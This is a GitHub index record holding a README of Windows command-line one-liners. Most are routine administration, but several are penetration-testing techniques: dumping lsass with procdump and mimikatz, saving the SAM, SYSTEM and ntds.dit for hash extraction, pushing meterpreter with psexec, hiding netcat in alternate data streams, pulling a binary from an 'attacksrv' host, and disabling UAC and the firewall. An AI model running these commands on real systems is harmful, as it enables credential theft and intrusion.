{"id":13942659,"url":"https://github.com/madhuakula/wincmdfu","last_synced_at":"2026-03-10T07:04:10.166Z","repository":{"id":50285009,"uuid":"48898946","full_name":"madhuakula/wincmdfu","owner":"madhuakula","description":"Windows one line commands that make life easier, shortcuts and command line fu.","archived":false,"fork":false,"pushed_at":"2018-08-28T15:41:28.000Z","size":135,"stargazers_count":186,"open_issues_count":0,"forks_count":41,"subscribers_count":18,"default_branch":"master","last_synced_at":"2025-04-11T09:59:32.592Z","etag":null,"topics":["cmd","infosec","pentesting","powershell","redte","security","windows"],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/madhuakula.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-01-02T04:46:46.000Z","updated_at":"2025-03-03T15:18:47.000Z","dependencies_parsed_at":"2022-08-25T14:40:57.046Z","dependency_job_id":null,"html_url":"https://github.com/madhuakula/wincmdfu","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/madhuakula/wincmdfu","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madhuakula%2Fwincmdfu","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madhuakula%2Fwincmdfu/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madhuakula%2Fwincmdfu/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madhuakula%2Fwincmdfu/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/madhuakula","download_url":"https://codeload.github.com/madhuakula/wincmdfu/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/madhuakula%2Fwincmdfu/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30326893,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-10T05:25:20.737Z","status":"ssl_error","status_checked_at":"2026-03-10T05:25:17.430Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cmd","infosec","pentesting","powershell","redte","security","windows"],"created_at":"2024-08-08T02:01:58.478Z","updated_at":"2026-03-10T07:04:10.124Z","avatar_url":"https://github.com/madhuakula.png","language":null,"funding_links":[],"categories":["Others"],"sub_categories":[],"readme":"\n# Windows CLI gems. Tweets of [@wincmdfu](https://www.twitter.com/wincmdfu)\n\nWindows one line commands that make life easier, shortcuts and command line fu.\n\n---\n\n## Table of Contents\n\n- [Get entires from IPv4 neighbor cache](#get-entires-from-ipv4-neighbor-cache)\n- [Get available wireless networks via cmd and netsh](#get-available-wireless-networks-via-cmd-and-netsh)\n- [Quick list IP addresses only](#quick-list-ip-addresses-only)\n- [List ALL services AND their binaries](#list-all-services-and-their-binaries)\n- [Export SAM from the Windows Registry to a file](#export-sam-from-the-windows-registry-to-a-file)\n- [Enable remote desktop using reg](#enable-remote-desktop-using-reg)\n- [Enable the boot log to see list of drivers loaded during startup](#enable-the-boot-log-to-see-list-of-drivers-loaded-during-startup)\n- [Powershell cmdlet to create System Restore Point](#powershell-cmdlet-to-create-system-restore-point)\n- [Check the current account for seDebugPrivilege](#check-the-current-account-for-sedebugprivilege)\n- [Enable/disable system users via command line](#enabledisable-system-users-via-command-line)\n- [View process that is consuming the most memory using powershell](#view-process-that-is-consuming-the-most-memory-using-powershell)\n- [Create an Alternate Data Stream from a file on an NTFS partition](#create-an-alternate-data-stream-from-a-file-on-an-ntfs-partition)\n- [Export running processes in CSV format](#export-running-processes-in-csv-format)\n- [Lock Windows desktop using command line](#lock-windows-desktop-using-command-line)\n- [Start explorer with a file or folder selected/highlighted](#start-explorer-with-a-file-or-folder-selectedhighlighted)\n- [Dump VirtualBox image containing RAM and ELF headers](#dump-virtualbox-image-containing-ram-and-elf-headers)\n- [Set Time Zone of the system clock](#set-time-zone-of-the-system-clock)\n- [Make folder inside a guest from the host](#make-folder-inside-a-guest-from-the-host)\n- [Force copy meterpreter binary to remote machines \u0026 run as system](#force-copy-meterpreter-binary-to-remote-machines--run-as-system)\n- [Create n/w share called `Apps`, with read access \u0026 limit to 10 conns](#create-nw-share-called-apps-with-read-access--limit-to-10-conns)\n- [List all the drives under My Computer using fsutil](#list-all-the-drives-under-my-computer-using-fsutil)\n- [Troubleshoot n/w packet drops with router statistics using pathping](#troubleshoot-nw-packet-drops-with-router-statistics-using-pathping)\n- [List unsigned dlls for a specific process. For system wide list](#list-unsigned-dlls-for-a-specific-process)\n- [Obtain a list of Windows XP computers on the domain using PS](#obtain-a-list-of-windows-xp-computers-on-the-domain-using-ps)\n- [Open the System Properties window, with the `Advanced` tab selected](#open-the-system-properties-window-with-the-advanced-tab-selected)\n- [Using the `dir` command to find Alternate Data Streams](#using-the-dir-command-to-find-alternate-data-streams)\n- [Use `procdump` to obtain the `lsass` process memory](#use-procdump-to-obtain-the-lsass-process-memory)\n- [Run `mimikatz` in `minidump` mode \u0026 use `mini.dmp` from `procdump`](#run-mimikatz-in-minidump-mode--use-minidmp-from-procdump)\n- [Get list of startup programs using wmic](#get-list-of-startup-programs-using-wmic)\n- [Add a binary to an Alternate Data Stream](#add-a-binary-to-an-alternate-data-stream)\n- [Execute a binary Alternate Data Stream Win 7/2008 using wmic](#execute-a-binary-alternate-data-stream-win-72008-using-wmic)\n- [Show config \u0026 state info for Network Access Protection enabled client](#show-config--state-info-for-network-access-protection-enabled-client)\n- [Get computer system information, including domain name and memory, using wmic](#get-computer-system-information-including-domain-name-and-memory-using-wmic)\n- [Use the Package Manager in Windows to install the Telnet client on Windows Vista \u0026 higher](#use-the-package-manager-in-windows-to-install-the-telnet-client-on-windows-vista--higher)\n- [Secure delete a file/folder in Windows](#secure-delete-a-filefolder-in-windows)\n- [Show all startup entries while hiding Microsoft entries. CSV output](#show-all-startup-entries-while-hiding-microsoft-entries-csv-output)\n- [Download files via commandline using PS](#download-files-via-commandline-using-ps)\n- [Fetch the last 10 entries from the Windows Security event log, in text format](#fetch-the-last-10-entries-from-the-windows-security-event-log-in-text-format)\n- [Create a dll that runs calc on invoke](#create-a-dll-that-runs-calc-on-invoke)\n- [Run a command as another user](#run-a-command-as-another-user)\n- [Get shutdown/reboot events from the last 1000 log entries using PS](#get-shutdownreboot-events-from-the-last-1000-log-entries-using-ps)\n- [Create a new snapshot of the volume that has the AD database and log files](#create-a-new-snapshot-of-the-volume-that-has-the-ad-database-and-log-files)\n- [Mount the snapshot](#mount-the-snapshot)\n- [Run a process on a remote system using wmic](#run-a-process-on-a-remote-system-using-wmic)\n- [List the machines, with usernames, that were connected via RDP](#list-the-machines-with-usernames-that-were-connected-via-rdp)\n- [List all process that are running on your system by remote users connected via RDP](#list-all-process-that-are-running-on-your-system-by-remote-users-connected-via-rdp)\n- [Reset the Windows TCP\\IP stack](#reset-the-windows-tcpip-stack)\n- [List logged on users](#list-logged-on-users)\n- [Set a static IP on a remote box](#set-a-static-ip-on-a-remote-box)\n- [Bypass powershell execution policy restrictions](#bypass-powershell-execution-policy-restrictions)\n- [List running processes every second on a remote box](#list-running-processes-every-second-on-a-remote-box)\n- [Get a list of running processes and their command line arguments on a remote system](#get-a-list-of-running-processes-and-their-command-line-arguments-on-a-remote-system)\n- [Remotely enable and start the Volume Shadow Copy Service](#remotely-enable-and-start-the-volume-shadow-copy-service)\n- [Ping multiple IPs from `ips.txt` \u0026 see live hosts](#ping-multiple-ips-from-ipstxt--see-live-hosts)\n- [Set global proxy in Windows to point to IE proxy](#set-global-proxy-in-windows-to-point-to-ie-proxy)\n- [Enumerate list of drivers with complete path information](#enumerate-list-of-drivers-with-complete-path-information)\n- [View Group Policy Objects that have been applied to a system](#view-group-policy-objects-that-have-been-applied-to-a-system)\n- [Reset the WMI repository to what it was when the OS was installed](#reset-the-wmi-repository-to-what-it-was-when-the-os-was-installed)\n- [Create symbolic links in Windows Vista, 7 \u0026 higher](#create-symbolic-links-in-windows-vista-7--higher)\n- [Enable the tftp client in Vista \u0026 higher](#enable-the-tftp-client-in-vista--higher)\n- [Obtain list of firewall rules on a local system](#obtain-list-of-firewall-rules-on-a-local-system)\n- [Get name of current domain controller](#get-name-of-current-domain-controller)\n- [Look at content cached in kernel mode on IIS 7 and higher](#look-at-content-cached-in-kernel-mode-on-iis-7-and-higher)\n- [Quick test to check `MS15_034`](#quick-test-to-check-ms15_034)\n- [Get a list of all open Named pipes via Powershell](#get-a-list-of-all-open-named-pipes-via-powershell)\n- [Possible `VENOM` detection on VirtualBox](#possible-venom-detection-on-virtualbox)\n- [List RDP sessions on local or remote in list format](#list-rdp-sessions-on-local-or-remote-in-list-format)\n- [Get a list of service packs \u0026 hotfixes using wmic for remote systems listed in file](#get-a-list-of-service-packs--hotfixes-using-wmic-for-remote-systems-listed-in-file)\n- [Export wireless connection profiles](#export-wireless-connection-profiles)\n- [Unzip using PowerShell](#unzip-using-powershell)\n- [Open the Network \u0026 Sharing center](#open-the-network--sharing-center)\n- [Remotely stop/start ftp on several systems](#remotely-stopstart-ftp-on-several-systems)\n- [To quickly find large files using cmd](#to-quickly-find-large-files-using-cmd)\n- [Print RDP connections](#print-rdp-connections)\n- [List scheduled tasks \u0026 binaries](#list-scheduled-tasks--binaries)\n- [Display the \"Stored User names and Passwords\" window](#display-the-stored-user-names-and-passwords-window)\n- [List namespaces \u0026 classes in WMI via PowerShell](#list-namespaces--classes-in-wmi-via-powershell)\n- [Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox](#convert-between-vdi-vmdk-vhd-raw-disk-images-using-virtualbox)\n- [Change file extensions recurseively](#change-file-extensions-recurseively)\n- [List IPs of running VirtualBox machines](#list-ips-of-running-virtualbox-machines)\n- [Windows Privilege Escalation](#windows-privilege-escalation)\n- [Enumerate packages with their oem inf filenames](#enumerate-packages-with-their-oem-inf-filenames)\n- [Install a driver package using inf file](#install-a-driver-package-using-inf-file)\n- [Malware Hunting with Mark Russinovich and the Sysinternals](#malware-hunting-with-mark-russinovich-and-the-sysinternals)\n- [Windows Nano Server APIs](#windows-nano-server-apis)\n- [Windows wifi hotspot using cmd](#windows-wifi-hotspot-using-cmd)\n- [Disable UAC via cmdline](#disable-uac-via-cmdline)\n- [Turn off Windows firewall for all profiles](#turn-off-windows-firewall-for-all-profiles)\n- [List Missing Updates](#list-missing-updates)\n- [Export SAM and SYSTEM. Dump password hashes offline](#export-sam-and-system-dump-password-hashes-offline)\n- [Convert Binary to base64 string to transfer across restricted RDP](#convert-binary-to-base64-string-to-transfer-across-restricted-rdp)\n- [Convert Base64 string to Binary](#convert-base64-string-to-binary)\n- [List services running as SYSTEM and possibly weak file permissions](#list-services-running-as-system-and-possibly-weak-file-permissions)\n- [Check Bitlocker status on a remote box](#check-bitlocker-status-on-a-remote-box)\n- [Export failed logon attempts](#export-failed-logon-attempts)\n- [Alternate Data Streams and PS](#alternate-data-streams-and-ps)\n- [Run the Windows Assessment tool for cpu and ram and disk](#run-the-windows-assessment-tool-for-cpu-and-ram-and-disk)\n- [Port forward (proxy) traffic to remote host and port](#port-forward-proxy-traffic-to-remote-host-and-port)\n- [Enable/Disable NetBIOS over TCP/IP](#enabledisable-netbios-over-tcpip)\n- [Compact multiple VDI files across folders](#compact-multiple-vdi-files-across-folders)\n- [Full scan using WinDefender](#full-scan-using-windefender)\n- [Generate 32 char random password](#generate-32-char-random-password)\n\n---\n\n### Get entires from IPv4 neighbor cache\n\n```\nC:\\\u003enetsh interface ipv4 show neighbors\n```\n\n### Get available wireless networks via cmd and netsh\n\n```\nC:\\\u003enetsh wlan show networks mode=b\n```\n\n### Quick list IP addresses only\n\nSave the following in `ip.bat` in `%PATH%`\n\n```\nC:\\\u003eipconfig | find /I \"pv\"\n```\nCall `ip` from CLI\n\n### List ALL services AND their binaries\n\n```\nfor /F \"tokens=2* delims= \" %i in ('sc query ^| find /I \"ce_name\"') do @sc qc %i %j\n```\n\n### Export SAM from the Windows Registry to a file\n\n```\nC:\\\u003ereg save HKLM\\SAM \"%temp%\\SAM.reg\"\n```\n\n### Enable remote desktop using reg\n\n```\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n```\n\n### Enable the boot log to see list of drivers loaded during startup\n\n```\nbcdedit /set bootlog yes\n```\nRead via `%windir%\\ntbtlog.txt`\n\n### Powershell cmdlet to create System Restore Point\n\n```\nPS C:\\\u003eCheckpoint-Computer -description \"Restore point!\"\n```\n\n### Check the current account for seDebugPrivilege\n\n```\nC:\\\u003e whoami /priv | findstr \"Debug\"\n```\nFor all privs:\n\n```\nC:\\\u003e whoami /priv\n```\n\n### Enable/disable system users via command line\n\n```\nC:\\\u003enet user test /active:yes (no)\n```\n\nGet full help on the net user command:\n\n```\nC:\\\u003enet help user\n```\n\n### View process that is consuming the most memory using powershell\n\n```\nPS C:\\\u003e (Get-Process | Sort-Object -Descending WS)[0]\n```\n\n### Create an Alternate Data Stream from a file on an NTFS partition\n\n```\nC:\\\u003etype data.txt \u003e C:\\windows\\explorer.exe:newads.txt\n```\n\n### Export running processes in CSV format\n\n```\nC:\\\u003e tasklist /FO CSV \u003e tasks.txt\n```\n\n### Lock Windows desktop using command line\n\n```\nC:\\\u003e rundll32 user32.dll,LockWorkStation\n```\n\n### Start explorer with a file or folder selected/highlighted\n\n```\nC:\\\u003e explorer /select,C:\\MyData\\sample.docx\n```\n\n### Dump VirtualBox image containing RAM and ELF headers\n\n```\nC:\\\u003evboxmanage debugvm \"WinXPLab1\" dumpguestcore --filename winxplab1.elf\n```\n\n### Set Time Zone of the system clock\n\n```\nC:\\\u003e tzutil /s \"Eastern Standard Time\"\n```\nList available Time zones:\n\n```\nC:\\\u003e tzutil /l\n```\n\n### Make folder inside a guest from the host\n\n**VirtualBox**\n\n```\nC:\\\u003e vboxmanage guestcontrol \"WinXP\" md \"C:\\\\test\" --username \"user\" --password \"pass\"\n```\n\n### Force copy meterpreter binary to remote machines \u0026 run as system\n\n```\nC:\\\u003e psexec @$ips.txt -s -u adminuser -p pass -f -c \\exploits\\mp.exe\n```\n\n### Create n/w share called `Apps`, with read access \u0026 limit to 10 conns\n\n```\nC:\\\u003e net share Apps=C:\\Apps /G:everyone,READ /US:10\n```\n\n### List all the drives under My Computer using fsutil\n\n```\nC:\\\u003e fsutil.exe fsinfo drives\n```\n\n### Troubleshoot n/w packet drops with router statistics using pathping\n\n```\nC:\\\u003e pathping -n www.google.com\n```\n\n### List unsigned dlls for a specific process. \n\n**For system wide list, remove the process name**\n\n```\nC:\\\u003e listdlls -u explorer.exe\n```\n\n### Obtain a list of Windows XP computers on the domain using PS\n\n**Server2008**\n\n```\nPS C:\\\u003e Get-ADComputer -filter {OperatingSystem -like \"*XP*\"}\n```\n\n### Open the System Properties window, with the `Advanced` tab selected\n\n**Change the number for different tabs**\n\n```\nC:\\\u003e control sysdm.cpl,,3\n```\n\n### Using the `dir` command to find Alternate Data Streams\n\n```\nC:\\\u003e dir /R | find \":$D\"\n```\nUsing streams `sysinternals` (shows path):\n\n```\nC:\\\u003e streams -s .\n```\n\n### Use `procdump` to obtain the `lsass` process memory. \n\n**Use `mimikatz` `minidump` to get passwords**\n\n```\nC:\\\u003e procdump -accepteula -ma lsass.exe mini.dmp\n```\n\n### Run `mimikatz` in `minidump` mode \u0026 use `mini.dmp` from `procdump`\n\n```\nmimikatz # sekurlsa::minidump mini.dmp\nmimikatz # sekurlsa::logonPasswords\n```\t\n\n### Get list of startup programs using wmic\n\n```\nC:\\\u003e wmic startup list full\n```\n\n### Add a binary to an Alternate Data Stream\n\n```\nC:\\\u003e type c:\\tools\\nc.exe \u003e c:\\nice.png:nc.exe\n```\nExecute it (XP/2K3):\n\n```\nC:\\\u003e start c:\\nice.png:nc.exe\n```\n\n### Execute a binary Alternate Data Stream Win 7/2008 using wmic\n\n```\nC:\\\u003e wmic process call create C:\\nice.png:nc.exe\n```\n\n### Show config \u0026 state info for Network Access Protection enabled client\n\nhttps://technet.microsoft.com/en-us/library/cc730902(v=ws.10).aspx\n\n```\nC:\\\u003e netsh nap client show configuration\n```\n\n### Get computer system information, including domain name and memory, using wmic\n\n```\nC:\\\u003e wmic computersystem list /format:csv\n```\n\n### Use the Package Manager in Windows to install the Telnet client on Windows Vista \u0026 higher\n\n```\nC:\\\u003e pkgmgr /iu:\"TelnetClient\"\n```\n\n### Secure delete a file/folder in Windows\n\n**Sysinternals**\n\n```\nC:\\\u003e sdelete -p 10 a.txt\n```\n\nTo recursively delete folders:\n\n```\nC:\\\u003e sdelete -10 -r C:\\data\\\n```\n\n### Show all startup entries while hiding Microsoft entries. CSV output\n\n**It covers more locations than Windows inbuilt tools**\n\n```\nC:\\\u003e autorunsc -m -c\n```\n\n### Download files via commandline using PS\n\n```\nPS C:\\\u003e ipmo BitsTransfer;Start-BitsTransfer -Source http://foo/nc.exe -Destination C:\\Windows\\Temp\\\n```\n\n### Fetch the last 10 entries from the Windows Security event log, in text format\n\n```\nC:\\\u003e wevtutil qe Security /c:10 /f:Text\n```\n**def is XML**\n\n### Create a dll that runs calc on invoke\n\n```\nmsfpayload windows/exec cmd=calc.exe R | msfencode -t dll -o rcalc.dll\n\nC:\\\u003e rundll32.exe rcalc.dll,1\n```\n\n### Run a command as another user\n\n**You will be prompted for password**\n\n```\nC:\\\u003e runas /noprofile /user:domain\\username \"mmc wf.msc\"\n```\n### Get shutdown/reboot events from the last 1000 log entries using PS\n\n```\nGet-EventLog -log system -n 1000 | Where {$_.eventid -eq '1074'} | fl -pr *\n```\n\n### Create a new snapshot of the volume that has the AD database and log files\n\n```\nC:\\\u003e ntdsutil sn \"ac i ntds\" create quit quit\n```\n### Mount the snapshot\n\n**Copy ntds.dit from snapshot \u0026 System hive from reg for pwd hashes**\n\n```\nC:\\\u003e ntdsutil snapshot \"list all\" \"mount 1\" quit quit\n```\n\n### Run a process on a remote system using wmic\n\n```\nC:\\\u003e wmic /node:ip process call create \"net user dum dum /add\"\n```\n\n### List the machines, with usernames, that were connected via RDP\n\n```\nC:\\\u003e reg query \"HKCU\\Software\\Microsoft\\Terminal Server Client\\Servers\" /s\n```\n\n### List all process that are running on your system by remote users connected via RDP\n\n```\nC:\\\u003e query process *\n```\n\n### Reset the Windows TCP\\IP stack\n\n```\nnetsh int ip reset c:\\tcpresetlog.txt\n```\n\n### List logged on users. \n\n**Very useful during a pentest to look for domain admins**\n\n```\nC:\\\u003e net session | find \"\\\\\"\n```\n\n### Set a static IP on a remote box\n\n```\nC:\\\u003e wmic /node:remotebox nicconfig where Index=1 call EnableStatic (\"192.168.1.4\"), (\"255.255.255.0\")\n```\n\n### Bypass powershell execution policy restrictions\n\n```\nPS C:\\\u003e powershell -ExecutionPolicy Bypass -Noninteractive -File .\\lastboot.ps1\n```\n\n### List running processes every second on a remote box\n\n```\nC:\\\u003e wmic /node:target process list brief /every:1\n```\n**Remove `/node:target` for localhost**\n\n### Get a list of running processes and their command line arguments on a remote system\n\n```\nC:\\\u003e wmic /node:target process get commandline, name\n```\n\n### Remotely enable and start the Volume Shadow Copy Service\n\n```\nC:\\\u003e sc \\\\target config vss start= auto\nC:\\\u003e sc \\\\target start vss\n```\n### Ping multiple IPs from `ips.txt` \u0026 see live hosts\n\n```\nC:\\\u003efor /F %i in (ips.txt) do ping -n 1 %i | find \"bytes=\"\n```\n\n### Set global proxy in Windows to point to IE proxy\n\n```\nC:\\\u003e netsh winhttp import proxy source=ie\n```\n\n### Enumerate list of drivers with complete path information\n\n```\nC:\\\u003e driverquery /FO list /v\n```\n\n### View Group Policy Objects that have been applied to a system\n**Very useful during pentests**\n\n```\nC:\\\u003e gpresult /z /h outputfile.html\n```\n\n### Reset the WMI repository to what it was when the OS was installed\n\n**Very helpful if you have a corrupt repo**\n\n```\nC:\\\u003e winmgmt /resetrepository\n```\n\n### Create symbolic links in Windows Vista, 7 \u0026 higher\n\n```\nC:\\\u003e mklink \u003clink\u003e \u003ctarget\u003e\nC:\\\u003e mklink D:\\newlink.txt E:\\thisexists.txt\n```\n### Enable the tftp client in Vista \u0026 higher\n\n```\nC:\\\u003e ocsetup TFTP /quiet\n```\nPull files to a `compromised server`:\n\n```\nC:\\\u003e tftp -i attacksrv get bin.exe\n```\n\n### Obtain list of firewall rules on a local system\n\n```\nC:\\\u003e netsh advfi fi sh rule name=all\n```\n**Can be combined with wmic for remote systems**\n\n### Get name of current domain controller\n\n```\nC:\\\u003e set log\nC:\\\u003e nltest /dcname:DOMAIN\n```\n\nGet list of all DCs:\n\n```\nC:\\\u003e nltest /dclist:DOMAIN\n```\n### Look at content cached in kernel mode on IIS 7 and higher\n\n```\nC:\\\u003e netsh http sh ca\n```\n**Useful when investigating the `MS15-034` HTTP.sys vuln**\n\n### Quick test to check `MS15_034`\n\n```\nC:\\\u003e curl -v -H \"Range: bytes=234234-28768768\" \"http://host/a.png\" -o a.png\n```\n**HTTP 416 = Vulnerable**\n\n**HTTP 20X = Not vulnerable**\n\n### Get a list of all open Named pipes via Powershell\n\n```\nPS C:\\\u003e [http://System.IO.Directory ]::GetFiles(\"\\\\.\\\\pipe\\\\\")\n```\n### Possible `VENOM` detection on VirtualBox\n\n```\nC:\\\u003e vboxmanage list -l vms \u003e a.txt\n```\n**Search 'Storage' \u0026 'Floppy'**\n\n### List RDP sessions on local or remote in list format\n\n```\nPS C:\\\u003e qwinsta /server: | foreach {($_.trim() -replace \"\\s+\",\",\")} | ConvertFrom-Csv\n```\n\n### Get a list of service packs \u0026 hotfixes using wmic for remote systems listed in file\n\n```\nC:\\\u003e wmic /node:@file /output:out.txt qfe list full\n```\n\n### Export wireless connection profiles\n\n```\nC:\\\u003e netsh wlan export profile\n```\n**`key=clear` allows plain text passwords**\n\n### Unzip using PowerShell\n\n```\nPS C:\\\u003e Add-Type -A System.IO.Compression.FileSystem;[IO.Compression.ZipFile]::ExtractToDirectory(src,dst)\n```\n### Open the Network \u0026 Sharing center\n\n```\ncontrol.exe /name Microsoft.NetworkandSharingCenter\n```\n**Create a shortcut of this as `ns` in `PATH` for ease**\n\n### Remotely stop/start ftp on several systems\n\n```\nC:\\\u003e wmic /node:@ips.txt /user:u /password:p process call create \"net \u003cstart\u003e msftpsvc\"\n```\n\n### To quickly find large files using cmd\n\n```\nC:\\\u003e forfiles /s /c \"cmd /c if @fsize gtr 100000 echo @path @fsize bytes\"\n```\n**Run from the dir you want**\n\n### Print RDP connections\n\n```\nfor /f \"delims=\" %i in ('reg query \"HKCU\\Software\\Microsoft\\Terminal Server Client\\Servers\"') do reg query \"%i\"\n```\n### List scheduled tasks \u0026 binaries\n\n```\nC:\\\u003e schtasks /query /fo LIST /v\n```\n**Weak permissions can be exploited for `localprivilege escalation`**\n\n### Display the \"Stored User names and Passwords\" window\n\n```\nC:\\\u003e rundll32 keymgr.dll,KRShowKeyMgr\n```\n### List namespaces \u0026 classes in WMI via PowerShell\n\n```\nPS C:\\\u003e gwmi -n root -cl __Namespace | Select name\n\nPS C:\\\u003e gwmi -n root\\cimv2 -li\n```\n\n### Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox\n\n```\nC:\\\u003e vboxmanage clonehd myvdi.vdi myvmdk.vmdk --format VMDK\n```\n\n### Change file extensions recurseively \n\n**csv to xls for eg**\n\n```\nC:\\Projects\u003e forfiles /S /M *.csv /C \"cmd /c ren @file @fname.xls\"\n```\n\n### List IPs of running VirtualBox machines\n\n```\nfor /F %i in ('VBoxManage list runningvms') do VBoxManage guestproperty enumerate %i | find \"IP\"\n```\n\n### Windows Privilege Escalation\n\n[![Windows Privilege Escalation](images/windows-privilege-esclation.png)](http://www.slideshare.net/riyazwalikar/windows-privilege-escalation)\n\n### Enumerate packages with their oem inf filenames\n\n```\nC:\\\u003e pnputil -e\n```\n\n### Install a driver package using inf file\n\n```\nC:\\\u003e pnputil -i -a path_to_inf\n```\n\n### Malware Hunting with Mark Russinovich and the Sysinternals\n\n[![Malware Hunting with Mark Russinovich and the Sysinternals Tools](http://img.youtube.com/vi/80vfTA9LrBM/0.jpg)](https://www.youtube.com/watch?v=80vfTA9LrBM)\n\n\n### Windows Nano Server APIs\n\n[https://msdn.microsoft.com/en-us/library/mt588480(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/mt588480(v=vs.85).aspx)\n\n### Windows wifi hotspot using cmd\n\nStarting a wifi hotspot using Windows cmd with ssid name `hotspotname` and key `password`\n\n![Windows wifi hotspot using cmd](images/wifihotspot.jpg)\n\n### Disable UAC via cmdline\n\n```\nC:\\\u003e reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system /v EnableLUA /t REG_DWORD /d 0 /f\n```\n### Turn off Windows firewall for all profiles\n\n**Useful if you have a bind shell**\n\n```\nC:\\\u003e netsh advfirewall set allprofiles state off\n```\n### List Missing Updates\n\n```\nPS C:\\\u003e (New-Object -c Microsoft.Update.Session).CreateUpdateSearcher().Search(\"IsInstalled=0\").Updates|Select Title\n```\n\n### Export SAM and SYSTEM Dump password hashes offline\n\n```\nC:\\\u003ereg save HKLM\\SAM SAM\nC:\\\u003ereg save HKLM\\SYSTEM SYSTEM\n```\n\n### Convert Binary to base64 string to transfer across restricted RDP\n\n```\nPS C:\\\u003e [Convert]::ToBase64String((gc -Pa \"a.exe\" -En By))\n```\n\n### Convert Base64 string to Binary\n\n```\nPS C:\\\u003e sc -Path \"a.exe\" -Val ([Convert]::FromBase64String((gc -Pa \"b64.txt\" ))) -En By\n```\n### List services running as SYSTEM and possibly weak file permissions\n\n```\nwmic service where StartName=\"LocalSystem\"|findstr /IV \":\\WIN :\\PROG\"\n```\n### Check Bitlocker status on a remote box\n\n```\nmanage-bde -status -cn \u003cbox\u003e\n```\nUse `wmic /node:@ips.txt` \u0026 `process` alias for multiple.\n\n### Export failed logon attempts\n\n```\nPS C:\\\u003e Get-EventLog -Log Security | ?{$_.EntryType -eq 'FailureAudit'} | epcsv log.csv\n```\n\n### Alternate Data Streams and PS\n\n- List all ADS for all files in current dir\n```\nPS C:\\\u003e gi * -s *\n```\n\n- Read ADS\n```\nPS C:\\\u003e gc \u003cfile\u003e -s \u003cADSName\u003e\n```\n\n- Create ADS using text input\n```\nPS C:\\\u003e sc \u003cfile\u003e -s \u003cADSName\u003e\n```\n\n- Delete ADS\n```\nPS C:\\\u003e ri \u003cfile\u003e -s \u003cADSName\u003e\n```\n\n### Run the Windows Assessment tool for cpu and ram and disk\n\n```\nC:\\\u003e winsat cpuformal -v\nC:\\\u003e winsat memformal -v\nC:\\\u003e winsat diskformal -v\n```\n\n### Port forward (proxy) traffic to remote host and port\n\n```\nC:\\\u003e netsh int p add v4tov4 \u003cLPORT\u003e \u003cRHOST\u003e [RPORT] [LHOST]\n```\n\n### Enable/Disable NetBIOS over TCP/IP\n\n```\nStep 1. Get Index of Network Adapter:\nC:\\\u003e wmic nicconfig get caption,index\n\nStep 2. Use the index \nC:\\\u003e wmic nicconfig where index=1 call SetTcpipNetbios 1\n\n0-Def\n1-En\n2-Dis\n```\n\n### Compact multiple VDI files across folders\n\n```\nC:\\\u003e for /F %i in ('dir /b /s *.vdi ^| find \".vdi\"') do vboxmanage modifyhd --compact %i\n```\n\n### Full scan using WinDefender\n\n```\nC:\\\u003e\"%ProgramFiles%\\Windows Defender\\MpCmdRun.exe\" -scan -scantype 2\n\nUse #wmic /node:@ips process for multiple.\n```\n\n### Generate 32 char random password\n\nSave as genpass.ps1\n```\nPS C:\\\u003e ([char[]](38..126)|sort{Get-Random})[0..32] -join ''\n```\n\n---\n## Contribution\n\nPlease read the [contribution guidelines](CONTRIBUTING.md) if you want to contribute.\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmadhuakula%2Fwincmdfu","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmadhuakula%2Fwincmdfu","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmadhuakula%2Fwincmdfu/lists"}